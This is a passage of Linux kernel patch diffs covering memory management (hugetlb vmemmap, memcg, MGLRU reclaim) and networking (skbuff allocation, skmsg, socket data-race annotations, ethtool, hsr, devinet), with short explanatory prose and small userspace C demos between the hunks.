+ 	if (!pgtable)
+ 		return -ENOMEM;
+ 
+@@ -53,7 +61,7 @@ static int __split_vmemmap_huge_pmd(pmd_t *pmd, unsigned long start)
+ 		pte_t entry, *pte;
+ 		pgprot_t pgprot = PAGE_KERNEL;
+ 
+-		entry = mk_pte(page + i, pgprot);
++		entry = mk_pte(head + i, pgprot);
+ 		pte = pte_offset_kernel(&__pmd, addr);
+ 		set_pte_at(&init_mm, addr, pte, entry);
+ 	}
+@@ -65,8 +73,8 @@ static int __split_vmemmap_huge_pmd(pmd_t *pmd, unsigned long start)
+ 		 * be treated as independent small pages (as they can be freed
+ 		 * individually).
+ 		 */
+-		if (!PageReserved(page))
+-			split_page(page, get_order(PMD_SIZE));
++		if (!PageReserved(head))
++			split_page(head, get_order(PMD_SIZE));
+ 
+ 		/* Make pte visible before pmd. See comment in pmd_install(). */
+ 		smp_wmb();
+@@ -80,20 +88,6 @@ static int __split_vmemmap_huge_pmd(pmd_t *pmd, unsigned long start)
+ 	return 0;
+ }
+ 
+-static int split_vmemmap_huge_pmd(pmd_t *pmd, unsigned long start)
+-{
+-	int leaf;
+-
+-	spin_lock(&init_mm.page_table_lock);
+-	leaf = pmd_leaf(*pmd);
+-	spin_unlock(&init_mm.page_table_lock);
+-
+-	if (!leaf)
+-		return 0;
+-
+-	return __split_vmemmap_huge_pmd(pmd, start);
+-}
+-
+ static void vmemmap_pte_range(pmd_t *pmd, unsigned long addr,
+ 			      unsigned long end,
+ 			      struct vmemmap_remap_walk *walk)
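
The hugetlb_vmemmap change folds the old leaf check into split_vmemmap_huge_pmd() so the PMD's head page is sampled exactly once under init_mm.page_table_lock, and a PMD that was split in the meantime is simply skipped. A simplified userspace sketch of that sample-under-lock shape (pthread-based, names illustrative):

#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static int *shared_entry;    /* stands in for the PMD being inspected */

static int split_entry(void)
{
        int *snapshot;

        /* Sample the entry once, under the lock... */
        pthread_mutex_lock(&lock);
        snapshot = shared_entry;
        pthread_mutex_unlock(&lock);

        /* ...and do the slow allocation work on the snapshot. */
        if (!snapshot)
                return 0;      /* already split by someone else: nothing to do */
        printf("splitting entry %d\n", *snapshot);
        return 1;
}

int main(void)
{
        int v = 42;

        shared_entry = &v;
        return !split_entry();
}
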
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 67b6d8238b3ed..0a403b241718e 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -3841,10 +3841,6 @@ static ssize_t mem_cgroup_write(struct kernfs_open_file *of,
+ 		case _MEMSWAP:
+ 			ret = mem_cgroup_resize_max(memcg, nr_pages, true);
+ 			break;
+-		case _KMEM:
+-			/* kmem.limit_in_bytes is deprecated. */
+-			ret = -EOPNOTSUPP;
+-			break;
+ 		case _TCP:
+ 			ret = memcg_update_tcp_max(memcg, nr_pages);
+ 			break;
+@@ -5055,12 +5051,6 @@ static struct cftype mem_cgroup_legacy_files[] = {
+ 		.seq_show = memcg_numa_stat_show,
+ 	},
+ #endif
+-	{
+-		.name = "kmem.limit_in_bytes",
+-		.private = MEMFILE_PRIVATE(_KMEM, RES_LIMIT),
+-		.write = mem_cgroup_write,
+-		.read_u64 = mem_cgroup_read_u64,
+-	},
+ 	{
+ 		.name = "kmem.usage_in_bytes",
+ 		.private = MEMFILE_PRIVATE(_KMEM, RES_USAGE),
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index d18296109aa7e..93d6f27dd40b4 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -4258,7 +4258,7 @@ static bool inc_min_seq(struct lruvec *lruvec, int type, bool can_swap)
+ 
+ 	/* prevent cold/hot inversion if force_scan is true */
+ 	for (zone = 0; zone < MAX_NR_ZONES; zone++) {
+-		struct list_head *head = &lrugen->lists[old_gen][type][zone];
++		struct list_head *head = &lrugen->folios[old_gen][type][zone];
+ 
+ 		while (!list_empty(head)) {
+ 			struct folio *folio = lru_to_folio(head);
+@@ -4269,7 +4269,7 @@ static bool inc_min_seq(struct lruvec *lruvec, int type, bool can_swap)
+ 			VM_WARN_ON_ONCE_FOLIO(folio_zonenum(folio) != zone, folio);
+ 
+ 			new_gen = folio_inc_gen(lruvec, folio, false);
+-			list_move_tail(&folio->lru, &lrugen->lists[new_gen][type][zone]);
++			list_move_tail(&folio->lru, &lrugen->folios[new_gen][type][zone]);
+ 
+ 			if (!--remaining)
+ 				return false;
+@@ -4297,7 +4297,7 @@ static bool try_to_inc_min_seq(struct lruvec *lruvec, bool can_swap)
+ 			gen = lru_gen_from_seq(min_seq[type]);
+ 
+ 			for (zone = 0; zone < MAX_NR_ZONES; zone++) {
+-				if (!list_empty(&lrugen->lists[gen][type][zone]))
++				if (!list_empty(&lrugen->folios[gen][type][zone]))
+ 					goto next;
+ 			}
+ 
+@@ -4331,6 +4331,7 @@ static void inc_max_seq(struct lruvec *lruvec, bool can_swap, bool force_scan)
+ 	int type, zone;
+ 	struct lru_gen_struct *lrugen = &lruvec->lrugen;
+ 
++restart:
+ 	spin_lock_irq(&lruvec->lru_lock);
+ 
+ 	VM_WARN_ON_ONCE(!seq_is_valid(lruvec));
+@@ -4341,11 +4342,12 @@ static void inc_max_seq(struct lruvec *lruvec, bool can_swap, bool force_scan)
+ 
+ 		VM_WARN_ON_ONCE(!force_scan && (type == LRU_GEN_FILE || can_swap));
+ 
+-		while (!inc_min_seq(lruvec, type, can_swap)) {
+-			spin_unlock_irq(&lruvec->lru_lock);
+-			cond_resched();
+-			spin_lock_irq(&lruvec->lru_lock);
+-		}
++		if (inc_min_seq(lruvec, type, can_swap))
++			continue;
++
++		spin_unlock_irq(&lruvec->lru_lock);
++		cond_resched();
++		goto restart;
+ 	}
+ 
+ 	/*
+@@ -4728,7 +4730,8 @@ void lru_gen_look_around(struct page_vma_mapped_walk *pvmw)
+  *                          the eviction
+  ******************************************************************************/
+ 
+-static bool sort_folio(struct lruvec *lruvec, struct folio *folio, int tier_idx)
++static bool sort_folio(struct lruvec *lruvec, struct folio *folio, struct scan_control *sc,
++		       int tier_idx)
+ {
+ 	bool success;
+ 	int gen = folio_lru_gen(folio);
+@@ -4762,7 +4765,7 @@ static bool sort_folio(struct lruvec *lruvec, struct folio *folio, int tier_idx)
+ 
+ 	/* promoted */
+ 	if (gen != lru_gen_from_seq(lrugen->min_seq[type])) {
+-		list_move(&folio->lru, &lrugen->lists[gen][type][zone]);
++		list_move(&folio->lru, &lrugen->folios[gen][type][zone]);
+ 		return true;
+ 	}
+ 
+@@ -4771,7 +4774,7 @@ static bool sort_folio(struct lruvec *lruvec, struct folio *folio, int tier_idx)
+ 		int hist = lru_hist_from_seq(lrugen->min_seq[type]);
+ 
+ 		gen = folio_inc_gen(lruvec, folio, false);
+-		list_move_tail(&folio->lru, &lrugen->lists[gen][type][zone]);
++		list_move_tail(&folio->lru, &lrugen->folios[gen][type][zone]);
+ 
+ 		WRITE_ONCE(lrugen->protected[hist][type][tier - 1],
+ 			   lrugen->protected[hist][type][tier - 1] + delta);
+@@ -4779,11 +4782,18 @@ static bool sort_folio(struct lruvec *lruvec, struct folio *folio, int tier_idx)
+ 		return true;
+ 	}
+ 
++	/* ineligible */
++	if (zone > sc->reclaim_idx) {
++		gen = folio_inc_gen(lruvec, folio, false);
++		list_move_tail(&folio->lru, &lrugen->folios[gen][type][zone]);
++		return true;
++	}
++
+ 	/* waiting for writeback */
+ 	if (folio_test_locked(folio) || folio_test_writeback(folio) ||
+ 	    (type == LRU_GEN_FILE && folio_test_dirty(folio))) {
+ 		gen = folio_inc_gen(lruvec, folio, true);
+-		list_move(&folio->lru, &lrugen->lists[gen][type][zone]);
++		list_move(&folio->lru, &lrugen->folios[gen][type][zone]);
+ 		return true;
+ 	}
+ 
+@@ -4831,7 +4841,8 @@ static bool isolate_folio(struct lruvec *lruvec, struct folio *folio, struct sca
+ static int scan_folios(struct lruvec *lruvec, struct scan_control *sc,
+ 		       int type, int tier, struct list_head *list)
+ {
+-	int gen, zone;
++	int i;
++	int gen;
+ 	enum vm_event_item item;
+ 	int sorted = 0;
+ 	int scanned = 0;
+@@ -4847,10 +4858,11 @@ static int scan_folios(struct lruvec *lruvec, struct scan_control *sc,
+ 
+ 	gen = lru_gen_from_seq(lrugen->min_seq[type]);
+ 
+-	for (zone = sc->reclaim_idx; zone >= 0; zone--) {
++	for (i = MAX_NR_ZONES; i > 0; i--) {
+ 		LIST_HEAD(moved);
+ 		int skipped = 0;
+-		struct list_head *head = &lrugen->lists[gen][type][zone];
++		int zone = (sc->reclaim_idx + i) % MAX_NR_ZONES;
++		struct list_head *head = &lrugen->folios[gen][type][zone];
+ 
+ 		while (!list_empty(head)) {
+ 			struct folio *folio = lru_to_folio(head);
+@@ -4863,7 +4875,7 @@ static int scan_folios(struct lruvec *lruvec, struct scan_control *sc,
+ 
+ 			scanned += delta;
+ 
+-			if (sort_folio(lruvec, folio, tier))
++			if (sort_folio(lruvec, folio, sc, tier))
+ 				sorted += delta;
+ 			else if (isolate_folio(lruvec, folio, sc)) {
+ 				list_add(&folio->lru, list);
+@@ -5250,7 +5262,7 @@ static bool __maybe_unused state_is_valid(struct lruvec *lruvec)
+ 		int gen, type, zone;
+ 
+ 		for_each_gen_type_zone(gen, type, zone) {
+-			if (!list_empty(&lrugen->lists[gen][type][zone]))
++			if (!list_empty(&lrugen->folios[gen][type][zone]))
+ 				return false;
+ 		}
+ 	}
+@@ -5295,7 +5307,7 @@ static bool drain_evictable(struct lruvec *lruvec)
+ 	int remaining = MAX_LRU_BATCH;
+ 
+ 	for_each_gen_type_zone(gen, type, zone) {
+-		struct list_head *head = &lruvec->lrugen.lists[gen][type][zone];
++		struct list_head *head = &lruvec->lrugen.folios[gen][type][zone];
+ 
+ 		while (!list_empty(head)) {
+ 			bool success;
+@@ -5832,7 +5844,7 @@ void lru_gen_init_lruvec(struct lruvec *lruvec)
+ 		lrugen->timestamps[i] = jiffies;
+ 
+ 	for_each_gen_type_zone(gen, type, zone)
+-		INIT_LIST_HEAD(&lrugen->lists[gen][type][zone]);
++		INIT_LIST_HEAD(&lrugen->folios[gen][type][zone]);
+ 
+ 	lruvec->mm_state.seq = MIN_NR_GENS;
+ 	init_waitqueue_head(&lruvec->mm_state.wait);
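
Besides renaming lrugen->lists to lrugen->folios, the vmscan hunks change scan_folios() to visit every zone, starting from sc->reclaim_idx and wrapping around, while sort_folio() moves folios from ineligible zones into the next generation instead of leaving them unscanned. The wrap-around index math, as a tiny standalone demo (the MAX_NR_ZONES value here is arbitrary):

#include <stdio.h>

#define MAX_NR_ZONES 5

int main(void)
{
        int reclaim_idx = 2;

        /* Visit every zone exactly once, eligible zones first,
         * then the ineligible ones, so they still get aged.
         */
        for (int i = MAX_NR_ZONES; i > 0; i--) {
                int zone = (reclaim_idx + i) % MAX_NR_ZONES;

                printf("scan zone %d\n", zone);
        }
        return 0;
}

With reclaim_idx = 2 and five zones the visit order is 2, 1, 0, 4, 3: everything at or below reclaim_idx comes first, then the rest.
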
+diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c
+index 007730412947d..3288490590f27 100644
+--- a/net/core/flow_dissector.c
++++ b/net/core/flow_dissector.c
+@@ -1738,8 +1738,7 @@ u32 __skb_get_hash_symmetric(const struct sk_buff *skb)
+ 
+ 	memset(&keys, 0, sizeof(keys));
+ 	__skb_flow_dissect(NULL, skb, &flow_keys_dissector_symmetric,
+-			   &keys, NULL, 0, 0, 0,
+-			   FLOW_DISSECTOR_F_STOP_AT_FLOW_LABEL);
++			   &keys, NULL, 0, 0, 0, 0);
+ 
+ 	return __flow_hash_from_keys(&keys, &hashrnd);
+ }
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 24bf4aa222d27..8dca4a7ca4a1f 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -424,17 +424,26 @@ EXPORT_SYMBOL(napi_build_skb);
+  * may be used. Otherwise, the packet data may be discarded until enough
+  * memory is free
+  */
+-static void *kmalloc_reserve(size_t size, gfp_t flags, int node,
++static void *kmalloc_reserve(unsigned int *size, gfp_t flags, int node,
+ 			     bool *pfmemalloc)
+ {
+-	void *obj;
+ 	bool ret_pfmemalloc = false;
++	size_t obj_size;
++	void *obj;
++
++	obj_size = SKB_HEAD_ALIGN(*size);
++
++	obj_size = kmalloc_size_roundup(obj_size);
++	/* The following cast might truncate high-order bits of obj_size, this
++	 * is harmless because kmalloc(obj_size >= 2^32) will fail anyway.
++	 */
++	*size = (unsigned int)obj_size;
+ 
+ 	/*
+ 	 * Try a regular allocation, when that fails and we're not entitled
+ 	 * to the reserves, fail.
+ 	 */
+-	obj = kmalloc_node_track_caller(size,
++	obj = kmalloc_node_track_caller(obj_size,
+ 					flags | __GFP_NOMEMALLOC | __GFP_NOWARN,
+ 					node);
+ 	if (obj || !(gfp_pfmemalloc_allowed(flags)))
+@@ -442,7 +451,7 @@ static void *kmalloc_reserve(size_t size, gfp_t flags, int node,
+ 
+ 	/* Try again but now we are using pfmemalloc reserves */
+ 	ret_pfmemalloc = true;
+-	obj = kmalloc_node_track_caller(size, flags, node);
++	obj = kmalloc_node_track_caller(obj_size, flags, node);
+ 
+ out:
+ 	if (pfmemalloc)
+@@ -479,7 +488,6 @@ struct sk_buff *__alloc_skb(unsigned int size, gfp_t gfp_mask,
+ {
+ 	struct kmem_cache *cache;
+ 	struct sk_buff *skb;
+-	unsigned int osize;
+ 	bool pfmemalloc;
+ 	u8 *data;
+ 
+@@ -504,18 +512,14 @@ struct sk_buff *__alloc_skb(unsigned int size, gfp_t gfp_mask,
+ 	 * aligned memory blocks, unless SLUB/SLAB debug is enabled.
+ 	 * Both skb->head and skb_shared_info are cache line aligned.
+ 	 */
+-	size = SKB_DATA_ALIGN(size);
+-	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-	osize = kmalloc_size_roundup(size);
+-	data = kmalloc_reserve(osize, gfp_mask, node, &pfmemalloc);
++	data = kmalloc_reserve(&size, gfp_mask, node, &pfmemalloc);
+ 	if (unlikely(!data))
+ 		goto nodata;
+ 	/* kmalloc_size_roundup() might give us more room than requested.
+ 	 * Put skb_shared_info exactly at the end of allocated zone,
+ 	 * to allow max possible filling before reallocation.
+ 	 */
+-	size = SKB_WITH_OVERHEAD(osize);
+-	prefetchw(data + size);
++	prefetchw(data + SKB_WITH_OVERHEAD(size));
+ 
+ 	/*
+ 	 * Only clear those fields we need to clear, not those that we will
+@@ -523,7 +527,7 @@ struct sk_buff *__alloc_skb(unsigned int size, gfp_t gfp_mask,
+ 	 * the tail pointer in struct sk_buff!
+ 	 */
+ 	memset(skb, 0, offsetof(struct sk_buff, tail));
+-	__build_skb_around(skb, data, osize);
++	__build_skb_around(skb, data, size);
+ 	skb->pfmemalloc = pfmemalloc;
+ 
+ 	if (flags & SKB_ALLOC_FCLONE) {
+@@ -578,8 +582,7 @@ struct sk_buff *__netdev_alloc_skb(struct net_device *dev, unsigned int len,
+ 		goto skb_success;
+ 	}
+ 
+-	len += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-	len = SKB_DATA_ALIGN(len);
++	len = SKB_HEAD_ALIGN(len);
+ 
+ 	if (sk_memalloc_socks())
+ 		gfp_mask |= __GFP_MEMALLOC;
+@@ -678,8 +681,7 @@ struct sk_buff *__napi_alloc_skb(struct napi_struct *napi, unsigned int len,
+ 		data = page_frag_alloc_1k(&nc->page_small, gfp_mask);
+ 		pfmemalloc = NAPI_SMALL_PAGE_PFMEMALLOC(nc->page_small);
+ 	} else {
+-		len += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-		len = SKB_DATA_ALIGN(len);
++		len = SKB_HEAD_ALIGN(len);
+ 
+ 		data = page_frag_alloc(&nc->page, len, gfp_mask);
+ 		pfmemalloc = nc->page.pfmemalloc;
+@@ -1837,10 +1839,7 @@ int pskb_expand_head(struct sk_buff *skb, int nhead, int ntail,
+ 	if (skb_pfmemalloc(skb))
+ 		gfp_mask |= __GFP_MEMALLOC;
+ 
+-	size = SKB_DATA_ALIGN(size);
+-	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-	size = kmalloc_size_roundup(size);
+-	data = kmalloc_reserve(size, gfp_mask, NUMA_NO_NODE, NULL);
++	data = kmalloc_reserve(&size, gfp_mask, NUMA_NO_NODE, NULL);
+ 	if (!data)
+ 		goto nodata;
+ 	size = SKB_WITH_OVERHEAD(size);
+@@ -6204,10 +6203,7 @@ static int pskb_carve_inside_header(struct sk_buff *skb, const u32 off,
+ 	if (skb_pfmemalloc(skb))
+ 		gfp_mask |= __GFP_MEMALLOC;
+ 
+-	size = SKB_DATA_ALIGN(size);
+-	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-	size = kmalloc_size_roundup(size);
+-	data = kmalloc_reserve(size, gfp_mask, NUMA_NO_NODE, NULL);
++	data = kmalloc_reserve(&size, gfp_mask, NUMA_NO_NODE, NULL);
+ 	if (!data)
+ 		return -ENOMEM;
+ 	size = SKB_WITH_OVERHEAD(size);
+@@ -6323,10 +6319,7 @@ static int pskb_carve_inside_nonlinear(struct sk_buff *skb, const u32 off,
+ 	if (skb_pfmemalloc(skb))
+ 		gfp_mask |= __GFP_MEMALLOC;
+ 
+-	size = SKB_DATA_ALIGN(size);
+-	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-	size = kmalloc_size_roundup(size);
+-	data = kmalloc_reserve(size, gfp_mask, NUMA_NO_NODE, NULL);
++	data = kmalloc_reserve(&size, gfp_mask, NUMA_NO_NODE, NULL);
+ 	if (!data)
+ 		return -ENOMEM;
+ 	size = SKB_WITH_OVERHEAD(size);
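
The skbuff refactor moves the SKB_HEAD_ALIGN and kmalloc_size_roundup() steps into kmalloc_reserve() itself, which now takes the size by pointer and writes back the bytes actually granted, so every caller accounts for the same value. A hedged sketch of the same out-parameter idiom (userspace C; the power-of-two rounding only approximates kmalloc's real bucket sizes):

#include <stdio.h>
#include <stdlib.h>

/* Round up to the next power of two, loosely like kmalloc buckets. */
static size_t size_roundup(size_t n)
{
        size_t b = 16;

        while (b < n)
                b <<= 1;
        return b;
}

/* Allocate, rounding the request up and reporting the size actually
 * granted back through *size, so the caller sees the same number.
 */
static void *alloc_reserve(unsigned int *size)
{
        size_t granted = size_roundup(*size);

        *size = (unsigned int)granted;
        return malloc(granted);
}

int main(void)
{
        unsigned int size = 1000;
        void *p = alloc_reserve(&size);

        printf("asked for 1000, got %u usable bytes\n", size);
        free(p);
        return 0;
}
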
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index 296e45b6c3c0d..a5c1f67dc96ec 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -611,12 +611,18 @@ static int sk_psock_skb_ingress_self(struct sk_psock *psock, struct sk_buff *skb
+ static int sk_psock_handle_skb(struct sk_psock *psock, struct sk_buff *skb,
+ 			       u32 off, u32 len, bool ingress)
+ {
++	int err = 0;
++
+ 	if (!ingress) {
+ 		if (!sock_writeable(psock->sk))
+ 			return -EAGAIN;
+ 		return skb_send_sock(psock->sk, skb, off, len);
+ 	}
+-	return sk_psock_skb_ingress(psock, skb, off, len);
++	skb_get(skb);
++	err = sk_psock_skb_ingress(psock, skb, off, len);
++	if (err < 0)
++		kfree_skb(skb);
++	return err;
+ }
+ 
+ static void sk_psock_skb_state(struct sk_psock *psock,
+@@ -684,9 +690,7 @@ static void sk_psock_backlog(struct work_struct *work)
+ 		} while (len);
+ 
+ 		skb = skb_dequeue(&psock->ingress_skb);
+-		if (!ingress) {
+-			kfree_skb(skb);
+-		}
++		kfree_skb(skb);
+ 	}
+ end:
+ 	mutex_unlock(&psock->work_mutex);
+diff --git a/net/core/sock.c b/net/core/sock.c
+index fc475845c94d5..e5858fa5d6d57 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -761,7 +761,8 @@ bool sk_mc_loop(struct sock *sk)
+ 		return false;
+ 	if (!sk)
+ 		return true;
+-	switch (sk->sk_family) {
++	/* IPV6_ADDRFORM can change sk->sk_family under us. */
++	switch (READ_ONCE(sk->sk_family)) {
+ 	case AF_INET:
+ 		return inet_sk(sk)->mc_loop;
+ #if IS_ENABLED(CONFIG_IPV6)
+@@ -1033,7 +1034,7 @@ static int sock_reserve_memory(struct sock *sk, int bytes)
+ 		mem_cgroup_uncharge_skmem(sk->sk_memcg, pages);
+ 		return -ENOMEM;
+ 	}
+-	sk->sk_forward_alloc += pages << PAGE_SHIFT;
++	sk_forward_alloc_add(sk, pages << PAGE_SHIFT);
+ 
+ 	WRITE_ONCE(sk->sk_reserved_mem,
+ 		   sk->sk_reserved_mem + (pages << PAGE_SHIFT));
+@@ -2689,9 +2690,9 @@ static long sock_wait_for_wmem(struct sock *sk, long timeo)
+ 		prepare_to_wait(sk_sleep(sk), &wait, TASK_INTERRUPTIBLE);
+ 		if (refcount_read(&sk->sk_wmem_alloc) < READ_ONCE(sk->sk_sndbuf))
+ 			break;
+-		if (sk->sk_shutdown & SEND_SHUTDOWN)
++		if (READ_ONCE(sk->sk_shutdown) & SEND_SHUTDOWN)
+ 			break;
+-		if (sk->sk_err)
++		if (READ_ONCE(sk->sk_err))
+ 			break;
+ 		timeo = schedule_timeout(timeo);
+ 	}
+@@ -2719,7 +2720,7 @@ struct sk_buff *sock_alloc_send_pskb(struct sock *sk, unsigned long header_len,
+ 			goto failure;
+ 
+ 		err = -EPIPE;
+-		if (sk->sk_shutdown & SEND_SHUTDOWN)
++		if (READ_ONCE(sk->sk_shutdown) & SEND_SHUTDOWN)
+ 			goto failure;
+ 
+ 		if (sk_wmem_alloc_get(sk) < READ_ONCE(sk->sk_sndbuf))
+@@ -3081,10 +3082,10 @@ int __sk_mem_schedule(struct sock *sk, int size, int kind)
+ {
+ 	int ret, amt = sk_mem_pages(size);
+ 
+-	sk->sk_forward_alloc += amt << PAGE_SHIFT;
++	sk_forward_alloc_add(sk, amt << PAGE_SHIFT);
+ 	ret = __sk_mem_raise_allocated(sk, size, amt, kind);
+ 	if (!ret)
+-		sk->sk_forward_alloc -= amt << PAGE_SHIFT;
++		sk_forward_alloc_add(sk, -(amt << PAGE_SHIFT));
+ 	return ret;
+ }
+ EXPORT_SYMBOL(__sk_mem_schedule);
+@@ -3116,7 +3117,7 @@ void __sk_mem_reduce_allocated(struct sock *sk, int amount)
+ void __sk_mem_reclaim(struct sock *sk, int amount)
+ {
+ 	amount >>= PAGE_SHIFT;
+-	sk->sk_forward_alloc -= amount << PAGE_SHIFT;
++	sk_forward_alloc_add(sk, -(amount << PAGE_SHIFT));
+ 	__sk_mem_reduce_allocated(sk, amount);
+ }
+ EXPORT_SYMBOL(__sk_mem_reclaim);
+@@ -3714,7 +3715,7 @@ void sk_get_meminfo(const struct sock *sk, u32 *mem)
+ 	mem[SK_MEMINFO_RCVBUF] = READ_ONCE(sk->sk_rcvbuf);
+ 	mem[SK_MEMINFO_WMEM_ALLOC] = sk_wmem_alloc_get(sk);
+ 	mem[SK_MEMINFO_SNDBUF] = READ_ONCE(sk->sk_sndbuf);
+-	mem[SK_MEMINFO_FWD_ALLOC] = sk->sk_forward_alloc;
++	mem[SK_MEMINFO_FWD_ALLOC] = sk_forward_alloc_get(sk);
+ 	mem[SK_MEMINFO_WMEM_QUEUED] = READ_ONCE(sk->sk_wmem_queued);
+ 	mem[SK_MEMINFO_OPTMEM] = atomic_read(&sk->sk_omem_alloc);
+ 	mem[SK_MEMINFO_BACKLOG] = READ_ONCE(sk->sk_backlog.len);
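
Most of the sock.c hunks are data-race annotations: lockless readers of sk_err, sk_shutdown and sk_family gain READ_ONCE(), and sk_forward_alloc updates go through the sk_forward_alloc_add() helper. In C11 terms these map roughly onto relaxed atomic accesses; a minimal stand-in (illustrative macros, not the kernel's):

#include <stdatomic.h>
#include <stdio.h>

/* Userspace stand-ins for READ_ONCE()/WRITE_ONCE(): one untearable
 * access the compiler may not duplicate, fuse, or cache in a register.
 */
#define WRITE_ONCE_INT(v, x) atomic_store_explicit(&(v), (x), memory_order_relaxed)
#define READ_ONCE_INT(v)     atomic_load_explicit(&(v), memory_order_relaxed)

static _Atomic int sk_err;

static void error_path(void) { WRITE_ONCE_INT(sk_err, 5); }
static int  wait_path(void)  { return READ_ONCE_INT(sk_err); }

int main(void)
{
        error_path();
        printf("observed sk_err=%d\n", wait_path());
        return 0;
}
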
+diff --git a/net/ethtool/ioctl.c b/net/ethtool/ioctl.c
+index 940c0e27be735..e31d1247b9f08 100644
+--- a/net/ethtool/ioctl.c
++++ b/net/ethtool/ioctl.c
+@@ -27,6 +27,7 @@
+ #include <linux/net.h>
+ #include <linux/pm_runtime.h>
+ #include <net/devlink.h>
++#include <net/ipv6.h>
+ #include <net/xdp_sock_drv.h>
+ #include <net/flow_offload.h>
+ #include <linux/ethtool_netlink.h>
+@@ -3090,7 +3091,6 @@ struct ethtool_rx_flow_rule *
+ ethtool_rx_flow_rule_create(const struct ethtool_rx_flow_spec_input *input)
+ {
+ 	const struct ethtool_rx_flow_spec *fs = input->fs;
+-	static struct in6_addr zero_addr = {};
+ 	struct ethtool_rx_flow_match *match;
+ 	struct ethtool_rx_flow_rule *flow;
+ 	struct flow_action_entry *act;
+@@ -3196,20 +3196,20 @@ ethtool_rx_flow_rule_create(const struct ethtool_rx_flow_spec_input *input)
+ 
+ 		v6_spec = &fs->h_u.tcp_ip6_spec;
+ 		v6_m_spec = &fs->m_u.tcp_ip6_spec;
+-		if (memcmp(v6_m_spec->ip6src, &zero_addr, sizeof(zero_addr))) {
++		if (!ipv6_addr_any((struct in6_addr *)v6_m_spec->ip6src)) {
+ 			memcpy(&match->key.ipv6.src, v6_spec->ip6src,
+ 			       sizeof(match->key.ipv6.src));
+ 			memcpy(&match->mask.ipv6.src, v6_m_spec->ip6src,
+ 			       sizeof(match->mask.ipv6.src));
+ 		}
+-		if (memcmp(v6_m_spec->ip6dst, &zero_addr, sizeof(zero_addr))) {
++		if (!ipv6_addr_any((struct in6_addr *)v6_m_spec->ip6dst)) {
+ 			memcpy(&match->key.ipv6.dst, v6_spec->ip6dst,
+ 			       sizeof(match->key.ipv6.dst));
+ 			memcpy(&match->mask.ipv6.dst, v6_m_spec->ip6dst,
+ 			       sizeof(match->mask.ipv6.dst));
+ 		}
+-		if (memcmp(v6_m_spec->ip6src, &zero_addr, sizeof(zero_addr)) ||
+-		    memcmp(v6_m_spec->ip6dst, &zero_addr, sizeof(zero_addr))) {
++		if (!ipv6_addr_any((struct in6_addr *)v6_m_spec->ip6src) ||
++		    !ipv6_addr_any((struct in6_addr *)v6_m_spec->ip6dst)) {
+ 			match->dissector.used_keys |=
+ 				BIT(FLOW_DISSECTOR_KEY_IPV6_ADDRS);
+ 			match->dissector.offset[FLOW_DISSECTOR_KEY_IPV6_ADDRS] =
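
The ethtool change swaps a memcmp() against a static zeroed in6_addr for ipv6_addr_any(), which tests the four 32-bit words directly. An equivalent standalone check (the struct name is made up):

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

struct in6_addr_ish { uint32_t s6_addr32[4]; };

/* All-zero test, equivalent to memcmp() against a zeroed address but
 * without needing a static zero constant.
 */
static bool addr_any(const struct in6_addr_ish *a)
{
        return (a->s6_addr32[0] | a->s6_addr32[1] |
                a->s6_addr32[2] | a->s6_addr32[3]) == 0;
}

int main(void)
{
        struct in6_addr_ish zero = { {0, 0, 0, 0} };
        struct in6_addr_ish set  = { {0, 0, 0, 1} };

        printf("%d %d\n", addr_any(&zero), addr_any(&set));
        return 0;
}
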
+diff --git a/net/hsr/hsr_forward.c b/net/hsr/hsr_forward.c
+index 629daacc96071..b71dab630a873 100644
+--- a/net/hsr/hsr_forward.c
++++ b/net/hsr/hsr_forward.c
+@@ -594,6 +594,7 @@ static int fill_frame_info(struct hsr_frame_info *frame,
+ 		proto = vlan_hdr->vlanhdr.h_vlan_encapsulated_proto;
+ 		/* FIXME: */
+ 		netdev_warn_once(skb->dev, "VLAN not yet supported");
++		return -EINVAL;
+ 	}
+ 
+ 	frame->is_from_san = false;
+diff --git a/net/ipv4/devinet.c b/net/ipv4/devinet.c
+index e8b9a9202fecd..35d6e74be8406 100644
+--- a/net/ipv4/devinet.c
++++ b/net/ipv4/devinet.c
+@@ -354,14 +354,14 @@ static void __inet_del_ifa(struct in_device *in_dev,
+ {
+ 	struct in_ifaddr *promote = NULL;
+ 	struct in_ifaddr *ifa, *ifa1;
+-	struct in_ifaddr *last_prim;
++	struct in_ifaddr __rcu **last_prim;
+ 	struct in_ifaddr *prev_prom = NULL;
+ 	int do_promote = IN_DEV_PROMOTE_SECONDARIES(in_dev);
+ 
+ 	ASSERT_RTNL();
+ 
+ 	ifa1 = rtnl_dereference(*ifap);
+-	last_prim = rtnl_dereference(in_dev->ifa_list);
++	last_prim = ifap;
+ 	if (in_dev->dead)
+ 		goto no_promotions;
+ 
+@@ -375,7 +375,7 @@ static void __inet_del_ifa(struct in_device *in_dev,
+ 		while ((ifa = rtnl_dereference(*ifap1)) != NULL) {
+ 			if (!(ifa->ifa_flags & IFA_F_SECONDARY) &&
+ 			    ifa1->ifa_scope <= ifa->ifa_scope)
+-				last_prim = ifa;
++				last_prim = &ifa->ifa_next;
+ 
+ 			if (!(ifa->ifa_flags & IFA_F_SECONDARY) ||
+ 			    ifa1->ifa_mask != ifa->ifa_mask ||
+@@ -439,9 +439,9 @@ no_promotions:
+ 
+ 			rcu_assign_pointer(prev_prom->ifa_next, next_sec);
+ 
+-			last_sec = rtnl_dereference(last_prim->ifa_next);
++			last_sec = rtnl_dereference(*last_prim);
+ 			rcu_assign_pointer(promote->ifa_next, last_sec);
